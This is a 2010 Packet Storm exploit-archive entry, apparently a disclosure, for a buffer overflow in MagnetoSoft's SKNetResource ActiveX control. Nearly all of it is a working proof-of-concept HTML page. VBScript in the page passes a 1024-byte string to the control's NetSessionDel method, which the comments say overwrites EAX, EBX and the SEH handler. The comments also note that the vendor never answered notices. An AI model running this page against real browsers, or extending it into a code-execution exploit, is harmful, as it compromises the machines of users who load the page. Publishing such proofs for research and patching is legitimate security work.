MagnetoSoft NetworkResources Active-X NetSessionDel Buffer Overflow

2010-04-14T00:00:00
ID PACKETSTORM:88310
Type packetstorm
Reporter sasquatch
Modified 2010-04-14T00:00:00

Description

                                        
                                            `<html>  
<object classid='clsid:61251370-92BF-4A0E-8236-5904AC6FC9F2' id='target' /></object>  
<script language='vbscript'>  
'Magneto Software Net Resource ActiveX NetSessionDel BOF  
'Discovered by: s4squatch  
'Site: www.securestate.com  
'Date Discovered: 02/11/10  
'www: http://www.magnetosoft.com/products/sknetresource/sknetresource_features.htm  
'Download: http://www.magnetosoft.com/downloads/SystemInfoPackSetup.exe  
'Vendor Notified: 02/02/10 --> NO RESPONSE  
'Vendor Notified: 02/11/10 --> NO RESPONSE  
'Vendor Notified: 02/17/10 --> NO RESPONSE  
'Published 04/13/10  
'SKNetResource.ocx  
'Function NetSessionDel ( ByVal strServerName As String , ByVal strClientName As String , ByVal nSessionId As Integer ) As Long  
'progid = "SKNETRESOURCELib.SKNetResource"  
  
'EAX, EBX, SEH overwritten  
  
buff = String(1024, "A")  
  
target.NetSessionDel "defaultV", buff, 1  
  
</script>  
  
`